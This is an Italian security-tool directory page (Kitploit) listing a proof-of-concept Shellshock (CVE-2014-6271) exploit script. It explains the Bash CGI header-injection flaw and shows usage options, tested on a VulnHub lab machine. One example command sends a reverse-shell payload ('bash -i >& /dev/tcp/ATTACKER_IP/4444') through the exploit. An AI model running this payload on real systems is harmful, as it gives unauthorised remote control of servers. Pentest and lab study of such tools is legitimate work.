Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-6271-Shellshock — CVE-2014-6271 Exploit | di infrar3d | Kitploit
Strumenti/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

CVE-2014-6271 Exploit | di infrar3d

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
5 mesi faNon ancora revisionato

CVE-2014-6271 Shellshock

xpl0ited da infrar3d

Questo repository contiene un exploit proof-of-concept per CVE-2014-6271 (Shellshock).

Shellshock è una vulnerabilità critica in GNU Bash in cui variabili d'ambiente appositamente create consentono l'esecuzione arbitraria di comandi.
Quando un server web passa le intestazioni HTTP a script CGI che invocano Bash, un attaccante può iniettare comandi tramite tali intestazioni.

Utilizzo:

root@kitploit:~
./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	print this message and exit
	-a | --address	target address (default is "localhost")
	-p | --port	target port (default is 80)
	-f | --file	target file (default is "/cgi-bin/shell.sh")
	-c | --command	command to execute on the target machine (default is "id")

Esempi:

root@kitploit:~
./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(testato sulla macchina VulnHub "Hacksudo - Thor")

⚠️ Disclaimer ⚠️

Questo software e il codice proof-of-concept sono forniti solo per scopi educativi e di ricerca.

  • Gli autori non sono responsabili di qualsiasi uso improprio o danno causato da questo programma.
  • Non utilizzarlo su alcun sistema senza esplicita autorizzazione preventiva.
  • L'uso di questi strumenti per attaccare obiettivi senza consenso è illegale.

Sei responsabile del rispetto di tutte le leggi applicabili. Fai un uso etico e responsabile.

Scarica lo strumento